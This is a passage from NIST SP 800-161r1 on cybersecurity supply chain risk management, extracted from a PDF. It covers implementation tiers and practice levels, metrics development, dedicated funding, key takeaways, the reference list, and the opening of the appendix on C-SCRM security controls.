perform their appointed cybersecurity supply chain risk management responsibilities. The
enterprise has formal agreements in place to communicate baseline requirements to its
suppliers and partners. The enterprise understands its external dependencies and
collaborates with partners to share information to enable risk-based management
decisions within the enterprise in response to events.
• CSF Tier 4: The enterprise actively consumes and distributes information with partners
and uses real-time or near real-time information to improve cybersecurity and supply
chain security before an event occurs. The enterprise leverages institutionalized
knowledge of cybersecurity supply chain risk management with its external suppliers and
partners, internally in related functional areas, and at all levels of the enterprise. The
enterprise communicates proactively using formal (e.g., agreements) and informal
mechanisms to develop and maintain strong relationships with its suppliers, buyers, and
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
51
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
other partners.
Building capabilities begins by establishing a solid programmatic foundation that includes
enabling strategies and plans, establishing policies and guidance, investment in training, and
dedicating program resources. Once this foundational capability is in place, enterprises can use
these progression charts to orient the strategic direction of their programs to target states of C-
SCRM capabilities in different areas of the program. Table 3-3 provides an example C-SCRM
implementation model.
Table 3-3: Example C-SCRM Practice Implementation Model33
Implementation
Level
Associated C-SCRM Practices
Foundational
•
Establish a C-SCRM PMO
•
Obtain leadership support for C-SCRM
•
C-SCRM policies across enterprise-levels
•
Define C-SCRM hierarchy
•
C-SCRM governance structure
•
Well-documented, consistent C-SCRM processes
•
Establish a C-SCRM aware culture
•
Quality and reliability program
•
Integrate C-SCRM into acquisition/procurement policies
•
Determine FIPS 199 impact levels
•
Explicit roles for C-SCRM
•
Adequate and dedicated C-SCRM resources
•
Defined C-SCRM control baseline
•
C-SCRM internal checks and balances to assure compliance
•
Supplier management program
•
C-SCRM included in an established incident management program
•
Processes to ensure suppliers disclose vulnerabilities
Sustaining
•
Threat-informed security program
•
Use of third-party assessments, site visits, and formal certification
•
Formal supplier monitoring program
•
Defined C-SCRM risk appetite and risk tolerances
•
Formalized information-sharing processes (e.g., engages w/ FASC)
•
Regular reporting of C-SCRM risks to executives/ risk committees
•
Formal C-SCRM training program
•
C-SCRM integrated into SDLC
•
C-SCRM integrated into contractual agreements
•
Suppliers participate in incident response, disaster recovery, and
contingency planning
•
Collaborate with suppliers to improve their cybersecurity practices
33 For more information on C-SCRM capabilities, refer to Section 1.5, C-SCRM Key Practices.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
52
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
•
Formally defined, collected, and reported C-SCRM metrics
Enhancing
•
C-SCRM process automation
•
Use quantitative risk analysis
•
Predictive and adaptive C-SCRM strategies and processes
•
Establish or participate in a community of practice
3.5.1. Measuring C-SCRM Through Performance Measures
Fig. 3-1: C-SCRM Metrics Development Process
Enterprises typically rely on information security measures to facilitate decision-making and
improve performance and accountability in their information security programs. Enterprises can
achieve similar benefits within their C-SCRM programs. Additionally, enterprises should report
C-SCRM metrics to the board through the ERM process. Figure 3-1 illustrates the process for
developing metrics, as outlined in [NIST SP 800-55, Rev. 1] and which includes:
• Stakeholder Interest Identification: Identify the primary (e.g., CISO, CIO, CTO) and
secondary C-SCRM stakeholders (e.g., CEO/Head of Agency, COO, CFO), and
define/measure requirements based on the context required for each stakeholder or
stakeholder group.
• Goals and Objectives Definition: Identify and document enterprise strategic and C-
SCRM-specific performance goals and objectives. These goals may be expressed in the
form of enterprise strategic plans, C-SCRM policies, requirements, laws, regulations, etc.
• C-SCRM Policies, Guidelines, and Procedure Review: Identify the desired C-SCRM
practices, controls, and expectations outlined within these documents and used to
guide/implement C-SCRM across the enterprise.
• C-SCRM Program Implementation Review: Collect any existing data, measures, and
evidence that can provide insights used to derive new measures. These may be found in
C-SCRM Plans, POA&Ms, supplier assessments, etc.
• Level of Implementation: Develop and map measures to the identified C-SCRM
standards, policies, and procedures to demonstrate the program’s implementation
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
53
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
progress. These measures should be considered when rendering decisions to prioritize
and invest in C-SCRM capabilities.
• C-SCRM Program Results on Efficiency and Effectiveness: Develop and map
measures of C-SCRM’s efficiency and effectiveness to the identified strategy and policy
objectives to gauge whether desired C-SCRM outcomes are met. These measures should
be considered part of policy refreshes.
• Business and Mission Impact: Develop and map measures to the identified enterprise
strategic and C-SCRM-specific objectives to offer insight into the impact of C-SCRM
(e.g., contribution to business process cost savings; reduction in national security risk).
These measures should be considered a component of goal and objective refreshes.
Similar to information security measures, C-SCRM-focused measures can be attained at different
levels of an enterprise. Table 3-4 provides example measurement topics across the three Risk
Management levels.
Table 3-4: Example Measurement Topics Across the Risk Management Levels
Risk Management
Level
Example Measurement Topics
Level 1
•
Policy adoption at lower levels
•
Timeliness of policy adoption at lower levels
•
Adherence to risk appetite and tolerance statements
•
Differentiated levels of risk exposure across Level 2
•
Compliance with regulatory mandates
•
Adherence to customer requirements
Level 2
•
Effectiveness of mitigation strategies
•
Time allocation across C-SCRM activities
•
Mission and business process-level risk exposure
•
Degree and quality of C-SCRM requirement adoption in
mission and business processes
•
Use of a C-SCRM PMO by Level 3
Level 3
•
Design effectiveness of controls
•
Operating effectiveness of controls
•
Cost efficiency of controls
Enterprises should validate identified C-SCRM goals and objectives with their targeted
stakeholder groups prior to beginning an effort to develop specific measures. When developing
C-SCRM measures, enterprises should focus on the stakeholder’s highest priorities and target
measures based on data that can be realistically sourced and gathered. Each established measure
should have a specified performance target used to gauge whether goals and objectives in
relation to that measure are being met. Enterprises should consider the use of measures templates
to formalize each measure and serve as a source of reference for all information pertaining to that
measure. Finally, enterprises should develop a formal feedback loop with stakeholders to ensure
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
54
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
that measures are continually providing the desired insights and remain aligned with the
enterprise’s overall strategic objectives for C-SCRM.
3.6.
Dedicated Resources
To appropriately manage cybersecurity risks throughout the supply chain, enterprises should
dedicate funds toward this effort. Identifying resource needs and taking steps to secure adequate,
recurring, and dedicated funding are essential and important activities that need to be built into
the C-SCRM strategy and implementation planning effort and incorporated into an enterprise’s
budgeting, investment review, and funds management processes. Access to adequate resources is
a critical, key enabler for the establishment and sustainment of a C-SCRM program capability.
Where feasible, enterprises should be encouraged to leverage existing fund sources to improve
their C-SCRM posture. The continued availability of dedicated funds will allow enterprises to
sustain, expand, and mature their capabilities over time.
Securing and assigning C-SCRM funding is representative of leadership’s commitment to the
importance of C-SCRM, its relevance to national and economic security, and ensuring the
protection, continuity, and resilience of mission and business processes and assets.
Funding facilitates goal and action-oriented planning. Examining resource needs and allocating
funding prompts a budgeting and strategic-planning process. Effective enterprises begin by
defining a set of goals and objectives upon which to build a strategic roadmap, laying out the
path to achieving them through the assignment and allocation of finite resources. The
establishment of dedicated funding tied to C-SCRM objectives sets conditions for accountability
of performance and compels responsible staff to be efficient, effective, and adopt a mindset of
continuously seeking to improve C-SCRM capabilities and achieve security enhancing
outcomes.
Obtaining new or increased funding can be a challenge as resources are often scarce and
necessary for many competing purposes. The limited nature of funds forces prioritization. C-
SCRM leaders need to first examine what can be accomplished within the constraints of existing
resources and be able to articulate, prioritize, and defend their requests for additional resources.
For new investment proposals, this requires a reconciliation of planned initiatives against the
enterprise’s mission and business objectives. When well-executed, a systematic planning process
can tighten the alignment of C-SCRM processes to these objectives.
Many C-SCRM processes can and should be built into existing program and operational
activities and may be adequately performed using available funds. However, there may be a need
for an influx of one-time resources to establish an initial C-SCRM program capability. For
example, this might include the need to hire new personnel with expertise in C-SCRM, acquire
contractor support to aid in developing C-SCRM program guidance, or develop content for role-
based C-SCRM training. There may also be insufficient resources in place to satisfy all recurring
C-SCRM program needs. Existing funds may need to be reallocated toward C-SCRM efforts or
new or additional funds requested. Enterprises should also seek out opportunities to leverage
shared services whenever practical.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
55
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
The use of shared services can optimize the use of scarce resources and concentrate capability
into centers of excellence that provide cost-efficient access to services, systems, or tools.
Enterprises can adopt cost-sharing mechanisms across their lower-level entities that allow cost-
efficient access to C-SCRM resources and capabilities. Enterprises that pursue shared-services
models for C-SCRM should also be aware of the challenges of such models. Shared services
(e.g., C-SCRM PMO) are most effective when the enterprise at large relies on a fairly
homogenous set of C-SCRM strategies, policies, and processes. In many instances, the
centralized delivery of C-SCRM services requires a robust technology infrastructure. The
enterprise’s systems should be able to support process automation and centralized delivery in
order to fully realize the benefits of a shared-services model.
Consultation with budget/finance officials is critical to understanding what options may be
available and viable in the near term and out-years. These officials can also advise on how best
to justify needs, as well as the timeframes and processes for requesting new funds. There are
likely different processes to follow for securing recurring funds versus requesting one-time
funding. For example, funding for a new information system to support a C-SCRM capability
may involve the development of a formal business case presented to an enterprise’s investment
review board for approval. Organizations may find it helpful to break out resource needs into
ongoing and one-time costs or into cost categories that align with budget formulation, resource
decision-making, and the allocation and management of available funds.
It is recommended that the C-SCRM PMO have the lead responsibility of coordinating with
mission and business process and budget officials to build out and maintain a multi-year C-
SCRM program budget that captures both recurring and non-recurring resource requirements and
maps those requirements to available funding and fund sources. To understand the amount of
funding required, when, and for what purpose, enterprises should identify and assess which type
and level of resources (people or things) are required to implement a C-SCRM program
capability and perform required C-SCRM processes on an ongoing basis. The cost associated
with each of these identified resource needs would then be captured, accumulated, and reflected
in a budget that includes line items for relevant cost categories, such as personnel costs,
contracts, training, travel, tools, or systems. This will provide the enterprise with a baseline
understanding of what can be accomplished within existing resource levels and where there are
gaps in need of being filled. The actual allocation of funds may be centralized in a single C-
SCRM budget or dispersed across the enterprise and reflected in individual office or mission and
business process-area budgets. Regardless of how funds are actually assigned, a centralized
picture of the C-SCRM budget and funds status will provide a valuable source of information
that justifies new requests, informs prioritization decisions, and adjusts expectations about
certain activities and the duration in which they can be accomplished.
Ensuring that C-SCRM program funding is distinctly articulated within the enterprise’s budget –
with performance measures linked to the funding – will drive accountability for results. The
visible dedication of funds in budget requests, performance plans, and reports compels leadership
attention on C-SCRM processes and the accomplishment of objectives. Budgets must be
requested and justified on a periodic basis. This process allows leadership and oversight officials
to trace and measure the effectiveness and efficiency of allocated resources. This, in turn, serves
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
56
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
as a driving function for program and operational C-SCRM personnel to track and manage their
performance.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
57
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Key Takeaways34
C-SCRM in Acquisition. Th eintegration of C-SCRM into acquisition activities is critical to the
success of any C-SCRM program. C-SCRM requirements should be embedded throughout the
acquisition life cycle. The C-SCRM activities include performing risk assessments of services,
suppliers, and products; identifying relevant C-SCRM controls; conducting due diligence; and
continuously monitoring suppliers.
Supply Chain Information Sharing. Enterprises will gain access to information critical to
understanding and mitigating cybersecurity risks throughout the supply chain by building
information-sharing processes and activities into C-SCRM programs. Enterprises should engage
with peers, business partners, suppliers, and information-sharing communities (e.g., ISACs) to
gain insight into cybersecurity risks throughout the supply chain and learn from the experiences
of the community at large.
C-SCRM Awareness and Training. Enterprises should adopt enterprise-wide and role-based
training programs to educate users on the potential impact that cybersecurity risks throughout the
supply chain can have on the business and how to adopt best practices for risk mitigation. Robust
C-SCRM training is a key enabler for enterprises as they shift toward a C-SCRM-aware culture.
C-SCRM Key Practices. This publication outlines several Foundational, Sustaining, and
Enabling C-SCRM practices that enterprises should adopt and tailor to their unique contexts.
Enterprises should prioritize reaching a base level of maturity in key practices before focusing on
advanced C-SCRM capabilities.
Capability Implementation Measurement and C-SCRM Measures. Enterprises should
actively manage the efficiency and effectiveness of their C-SCRM programs. First, enterprises
should adopt a C-SCRM framework as the basis for measuring their progress toward C-SCRM
objectives. Next, enterprises should create and implement quantitative performance measures
and target tolerance that provide a periodic glimpse into the enterprise’s progress through the
lens of specific operational objectives.
Dedicated Resources. Where possible and applicable, enterprises should commit dedicated
funds to C-SCRM. The benefits of doing so include facilitating strategic and goal-oriented
planning, driving accountability of internal stakeholders to execute and mature the C-SCRM
practices of the enterprise, and the continuous monitoring of progress by enterprise leadership.
34 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
58
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
REFERENCES
[CISA SCRM WG3] Cybersecurity and Infrastructure Agency – Working Group 3 (2021)
Mitigating ICT Supply Chain Risks with Qualified Bidder and Manufacturer Lists
(Arlington, Virginia). Available at
https://www.cisa.gov/sites/default/files/publications/ICTSCRMTF_Qualified-Bidders-
Lists_508.pdf
[COSO 2011] Rittenberg L, Martens F (2012) Enterprise Risk Management: Understanding and
Communicating Risk Appetite. (Committee of Sponsoring Organizations of the Treadway
Commission), Thought Leadership in ERM. Available at
https://www.coso.org/Documents/ERM-Understanding-and-Communicating-Risk-
Appetite.pdf
[COSO 2020] Martens F, Rittenberg L (2020) Risk Appetite – Critical to Success: Using Risk
Appetite To Thrive in a Changing World. (Committee of Sponsoring Organization of the
Treadway Commission), Thought Leadership in ERM. Available at
https://www.coso.org/Documents/COSO-Guidance-Risk-Appetite-Critical-to-Success.pdf
[Defense Industrial Base Assessment: Counterfeit Electronics] Bureau of Industry and Security,
Office of Technology Evaluation (2010) Defense Industrial Base Assessment: Counterfeit
Electronics. (U.S. Department of Commerce, Washington, D.C.). Available at
https://www.bis.doc.gov/index.php/documents/technology-evaluation/37-defense-
industrial-base-assessment-of-counterfeit-electronics-2010/file
[FedRAMP] General Services Administration (2022) FedRAMP. Available at
http://www.fedramp.gov/
[GAO] Government Accountability Office (2020) Information Technology: Federal Agencies
Need to Take Urgent Action to Manage Supply Chain Risks. (U.S. Government
Accountability Office, Washington D.C.), Report to Congressional Requesters GAO-21-
171. Available at https://www.gao.gov/assets/gao-21-171.pdf
[CNSSI 4009] Committee on National Security Systems (2015) Committee on National Security
Systems (CNSS) Glossary (CNSS, Ft. Meade, Md.), CNSSI 4009-2015. Available at
https://www.cnss.gov/CNSS/issuances/Instructions.cfm
[EO 14028] Executive Order 14028 (2021) Improving the Nation’s Cybersecurity. (The White
House, Washington, DC), DCPD-202100401, May 12, 2021.
https://www.govinfo.gov/app/details/DCPD-202100401
[FASCA] Federal Acquisition Supply Chain Security Act of 2018 (FASCA), Title II of the
Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure Technology
Act (SECURE) Technology Act of 2018, Pub. L. 115-390, 132 Stat. 5173. Available at
https://www.congress.gov/115/plaws/publ390/PLAW-115publ390.pdf
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
59
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
[FIPS 199] National Institute of Standards and Technology (2004) Standards for Security
Categorization of Federal Information and Information Systems. (U.S. Department of
Commerce, Washington, DC), Federal Information Processing Standards Publication
(FIPS) 199. https://doi.org/10.6028/NIST.FIPS.199
[FIPS 200] National Institute of Standards and Technology (2006) Minimum Security
Requirements for Federal Information and Information Systems. (U.S. Department of
Commerce, Washington, DC), Federal Information Processing Standards Publication
(FIPS) 200. https://doi.org/10.6028/NIST.FIPS.200
[FSP] Cyber Risk Institute (2020) Financial Services Cybersecurity Framework Profile Version
1.0. Available at https://cyberriskinstitute.org/the-profile/
[ISO 9000] International Organization for Standardization (2015) ISO 9000:2015 — Quality
management — Fundamentals and vocabulary (ISO, Geneva). Available at
https://www.iso.org/standard/45481.html
[ISO 28001] International Organization for Standardization (2007) ISO 28001:2007 — Security
management systems for the supply chain — Best practices for implementing supply chain
security, assessments and plans — Requirements and guidance (ISO, Geneva). Available at
https://www.iso.org/standard/45654.html.
[ISO Guide 73] International Organization for Standardization (2009) ISO Guide 73:2009 —
Risk management — Vocabulary (ISO, Geneva). Available at
https://www.iso.org/standard/44651.html
[ISO/IEC 2382] International Organization for Standardization/International Electrotechnical
Commission (2015) ISO/IEC 2382:2015 — Information technology — Vocabulary (ISO,
Geneva). Available at https://www.iso.org/standard/63598.html
[ISO/IEC 20243] International Organization for Standardization/International Electrotechnical
Commission (2018) ISO/IEC 20243-1:2018 – Information technology — Open Trusted
Technology ProviderTM Standard (O-TTPS) — Mitigating maliciously tainted and
counterfeit products Part 1: Requirements and recommendations (ISO, Geneva). Available
at https://www.iso.org/standard/74399.html
[ISO/IEC 27000] International Organization for Standardization/International Electrotechnical
Commission (2018) ISO/IEC 27000:2018 – Information technology – Security techniques –
Information security management systems – Overview and vocabulary (ISO, Geneva).
Available at https://www.iso.org/standard/73906.html
[ISO/IEC 27002] International Organization for Standardization/International Electrotechnical
Commission (2022) ISO/IEC 27002:2022 – Information security, cybersecurity and
privacy protection – Information security controls (ISO, Geneva). Available at
https://www.iso.org/standard/75652.html
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
60
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
[ISO/IEC 27036] International Organization for Standardization/International Electrotechnical
Commission (2014) ISO/IEC 27036-2:2014 – Information technology – Security
techniques – Information security for supplier relationships – Part 2: Requirements (ISO,
Geneva). Available at https://www.iso.org/standard/59680.html
[ISO/IEC/IEEE 15288] International Organization for Standardization/International
Electrotechnical Commission/Institute of Electrical and Electronics Engineers (2015)
ISO/IEC/IEEE 15288:2015 — Systems and software engineering — System life cycle
processes (ISO, Geneva). Available at https://www.iso.org/standard/63711.html
[ITIL Service Strategy] Cannon D (2011) ITIL Service Strategy (The Stationary Office, London),
2nd Ed.
[NDIA] National Defense Industrial Association System Assurance Committee (2008)
Engineering for System Assurance. (NDIA, Arlington, VA). Available at
https://www.ndia.org/-/media/sites/ndia/meetings-and-events/divisions/systems-
engineering/sse-committee/systems-assurance-guidebook.ashx.
[NIST CSF] National Institute of Standards and Technology (2018) Framework for Improving
Critical Infrastructure Cybersecurity, Version 1.1. (National Institute of Standards and
Technology, Gaithersburg, MD). https://doi.org/10.6028/NIST.CSWP.04162018
[NIST SCRM Proceedings 2012] National Institute of Standards and Technology (2012)
Summary of the Workshop on Information and Communication Technologies Supply Chain
Risk Management. Available at
https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=913338
[NIST SP 800-16] deZafra DE, Pitcher SI, Tressler JD, Ippolito JB (1998) Information
Technology Security Training Requirements: a Role- and Performance-Based Model.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-16. https://doi.org/10.6028/NIST.SP.800-16
[NIST SP 800-30 Rev. 1] Joint Task Force Transformation Initiative (2012) Guide for
Conducting Risk Assessments. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-30, Rev. 1.
https://doi.org/10.6028/NIST.SP.800-30r1
[NIST SP 800-32] Kuhn DR, Hu VC, Polk WT, Chang S-jH (2001) Introduction to Public Key
Technology and the Federal PKI Infrastructure. (National Institute of Standards and
Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-32.
https://doi.org/10.6028/NIST.SP.800-32
[NIST SP 800-34 Rev. 1] Swanson MA, Bowen P, Phillips AW, Gallup D, Lynes D (2010)
Contingency Planning Guide for Federal Information Systems. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-34,
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
61
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Rev. 1, Includes updates as of November 11, 2010. https://doi.org/10.6028/NIST.SP.800-
34r1
[NIST SP 800-37] Joint Task Force (2018) Risk Management Framework for Information
Systems and Organizations: A System Life Cycle Approach for Security and Privacy.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-37, Rev. 2. https://doi.org/10.6028/NIST.SP.800-37r2
[NIST SP 800-39] Joint Task Force Transformation Initiative (2011) Managing Information
Security Risk: Organization, Mission, and Information System View. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-39.
https://doi.org/10.6028/NIST.SP.800-39
[NIST SP 800-53 Rev. 5] Joint Task Force (2020) Security and Privacy Controls for Information
Systems and Organizations. (National Institute of Standards and Technology, Gaithersburg,
MD), NIST Special Publication (SP) 800-53, Rev. 5. Includes updates as of December 10,
2020. https://doi.org/10.6028/NIST.SP.800-53r5
[NIST SP 800-53A Rev. 5] Joint Task Force (2022) Assessing Security and Privacy Controls in
Information Systems and Organizations. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-53A, Rev. 5.
https://doi.org/10.6028/NIST.SP.800-53Ar5
[NIST SP 800-53B] Joint Task Force (2020) Control Baselines for Information Systems and
Organizations. (National Institute of Standards and Technology, Gaithersburg, MD), NIST
Special Publication (SP) 800-53B, Includes updates as of December 10, 2020.
https://doi.org/10.6028/NIST.SP.800-53B
[NIST SP 800-55 Rev. 1] Chew E, Swanson MA, Stine KM, Bartol N, Brown A, Robinson W
(2008) Performance Measurement Guide for Information Security. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-55,
Rev. 1. https://doi.org/10.6028/NIST.SP.800-55r1
[NIST SP 800-64] Kissel R, Stine KM, Scholl MA, Rossman H, Fahlsing J, Gulick, J (2008)
Security Considerations in the System Development Life Cycle. (National Institute of
Standards and Technology, Gaithersburg, MD), (Withdrawn) NIST Special Publication
(SP) 800-64 Rev. 2. https://doi.org/10.6028/NIST.SP.800-64r2
[NIST SP 800-100] Bowen P, Hash J, Wilson M (2006) Information Security Handbook: A
Guide for Managers. (National Institute of Standards and Technology, Gaithersburg, MD),
NIST Special Publication (SP) 800-100, Includes updates as of March 7, 2007.
https://doi.org/10.6028/NIST.SP.800-100
[NIST SP 800-115] Scarfone KA, Souppaya MP, Cody A, Orebaugh AD (2008) Technical
Guide to Information Security Testing and Assessment. (National Institute of Standards
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
62
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-115.
https://doi.org/10.6028/NIST.SP.800-115
[NIST SP 800-160 Vol. 1] Ross RS, Oren JC, McEvilley M (2016) Systems Security
Engineering: Considerations for a Multidisciplinary Approach in the Engineering of
Trustworthy Secure Systems. (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Special Publication (SP) 800-160, Vol. 1, Includes updates as of
March 21, 2018. https://doi.org/10.6028/NIST.SP.800-160v1
[NIST SP 800-160 Vol. 2] Ross RS, Pillitteri VY, Graubart R, Bodeau D, McQuaid R (2021)
Developing Cyber Resilient Systems: A Systems Security Engineering Approach.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-160, Vol. 2, Rev. 1. https://doi.org/10.6028/NIST.SP.800-160v2r1
[NIST SP 800-171 Rev. 2] Ross RS, Pillitteri VY, Dempsey KL, Riddle M, Guissanie G (2020)
Protecting Controlled Unclassified Information in Nonfederal Systems and Organizations.
(National Institute of Standards and Technology, Gaithersburg, MD), NIST Special
Publication (SP) 800-171, Rev. 2, Includes updates as of January 28, 2021.
https://doi.org/10.6028/NIST.SP.800-171r2
[NIST SP 800-172] Ross RS, Pillitteri VY, Guissanie G, Wagner R, Graubart R, Bodeau D
(2021) Enhanced Security Requirements for Protecting Controlled Unclassified
Information: A Supplement to NIST Special Publication 800-171. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-172.
https://doi.org/10.6028/NIST.SP.800-172
[NIST SP 800-181 Rev. 1] Petersen R, Santos D, Wetzel KA, Smith MC, Witte GA (2017)
Workforce Framework for Cybersecurity (NICE Framework). (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Special Publication (SP) 800-181,
Rev. 1. https://doi.org/10.6028/NIST.SP.800-181r1
[NIST SSDF] National Institute of Standards and Technology (2022) NIST Secure Software
Development Framework. Available at https://csrc.nist.gov/projects/ssdf
[NISTIR 7622] Boyens JM, Paulsen C, Bartol N, Shankles S, Moorthy R (2012) Notional Supply
Chain Risk Management Practices for Federal Information Systems. (National Institute of
Standards and Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR)
7622. https://doi.org/10.6028/NIST.IR.7622
[NISTIR 8179] Paulsen C, Boyens JM, Bartol N, Winkler K (2018) Criticality Analysis Process
Model: Prioritizing Systems and Components. (National Institute of Standards and
Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR) 8179.
https://doi.org/10.6028/NIST.IR.8179
[NISTIR 8276] Boyens J, Paulsen C, Bartol N, Winkler K, Gimbi J (2021) Key Practices in
Cyber Supply Chain Risk Management: Observations from Industry. (National Institute of
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
63
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Standards and Technology, Gaithersburg, MD), NIST Interagency or Internal Report (IR)
8276. https://doi.org/10.6028/NIST.IR.8276
[NISTIR 8286] Stine KM, Quinn SD, Witte GA, Gardner RK (2020) Integrating Cybersecurity
and Enterprise Risk Management (ERM). (National Institute of Standards and Technology,
Gaithersburg, MD), NIST Interagency or Internal Report (IR) 8286.
https://doi.org/10.6028/NIST.IR.8286
[NTIA SBOM] The Minimum Elements For a Software Bill of Materials (SBOM), NTIA and
Department of Commerce, 2021
https://www.ntia.doc.gov/files/ntia/publications/sbom_minimum_elements_report.pdf
[OMB A-123] Office of Management and Budget (2004) Management’s Responsibility for
Internal Control. (The White House, Washington, DC), OMB Circular A-123, December
21, 2004. Available at https://georgewbush-
whitehouse.archives.gov/omb/circulars/a123/a123_rev.html
[OMB A-130] Office of Management and Budget (2016) Managing Information as a Strategic
Resource. (The White House, Washington, DC), OMB Circular A-130, July 28, 2016.
Available at
https://obamawhitehouse.archives.gov/sites/default/files/omb/assets/OMB/circulars/a130/a
130revised.pdf
[SAFECode 1] Software Assurance Forum for Excellence in Code (2010) Software Integrity
Controls: An Assurance-Based Approach to Minimizing Risks in the Software Supply
Chain. Available at
http://www.safecode.org/publications/SAFECode_Software_Integrity_Controls0610.pdf
[SAFECode 2] Software Assurance Forum for Excellence in Code (2009) The Software Supply
Chain Integrity Framework: Defining Risks and Responsibilities for Securing Software in
the Global Supply Chain. Available at
http://www.safecode.org/publication/SAFECode_Supply_Chain0709.pdf
[SwA] Polydys ML, Wisseman S (2008) Software Assurance in Acquisition: Mitigating Risks to
the Enterprise. A Reference Guide for Security-Enhanced Software Acquisition and
Outsourcing. (National Defense University Press, Washington, D.C.) Information
Resources Management College Occasional Paper. Available at
https://apps.dtic.mil/dtic/tr/fulltext/u2/a495389.pdf
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
64
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX A: C-SCRM SECURITY CONTROLS 35
C-SCRM CONTROLS INTRODUCTION
NIST defines security controls as:
The management, operational, and technical controls (i.e., safeguards or
countermeasures) prescribed for an information system to protect the
confidentiality, integrity, and availability of the system and its information. [FIPS
199]
[NIST SP 800-53, Rev. 5] defines numerous cybersecurity supply chain-related controls within
the catalog of information security controls. This section is structured as an enhanced overlay of
[NIST SP 800-53, Rev. 5]. It identifies and augments C-SCRM-related controls with additional
supplemental guidance and provides new controls as appropriate. The C-SCRM controls are
organized into the 20 control families of [NIST SP 800-53, Rev. 5]. This approach facilitates use
of the security controls assessment techniques articulated in [NIST SP 800-53A, Rev. 5] to
assess implementation of C-SCRM controls.
The controls provided in this publication are intended for enterprises to implement internally and
to require of their contractors and subcontractors if and when applicable and as articulated in a
contractual agreement. As with [NIST SP 800-53, Rev. 5], the security controls and control
enhancements are a starting point from which controls/enhancements may be removed, added, or
specialized based on an enterprise’s needs. Each control in this section is listed for its
applicability to C-SCRM. Those controls from [NIST SP 800-53, Rev. 5] not listed are not
considered directly applicable to C-SCRM and, thus, are not included in this publication. Details
and supplemental guidance for the various C-SCRM controls in this publication are contained in
Section 4.5.
C-SCRM CONTROLS SUMMARY
During the Respond step of the risk management process articulated in Section 2, enterprises
select, tailor, and implement controls for mitigating cybersecurity risks throughout the supply
chain. [NIST 800-53B] lists a set of information security controls at the [FIPS 199] high-,
moderate-, and low-impact levels. This section describes how these controls help mitigate risk to
information systems and components, as well as the supply chain infrastructure. The section
provides 20 C-SCRM control families that include relevant controls and supplemental guidance.
Figure A-1 depicts the process used to identify, refine, and add C-SCRM supplemental guidance
to the [NIST SP 800-53, Rev. 5] C-SCRM-related controls and represents the following steps:
1. Select and extract individual controls and enhancements from [NIST SP 800-53, Rev. 5]
applicable to C-SCRM.
2. Analyze these controls to determine how they apply to C-SCRM.
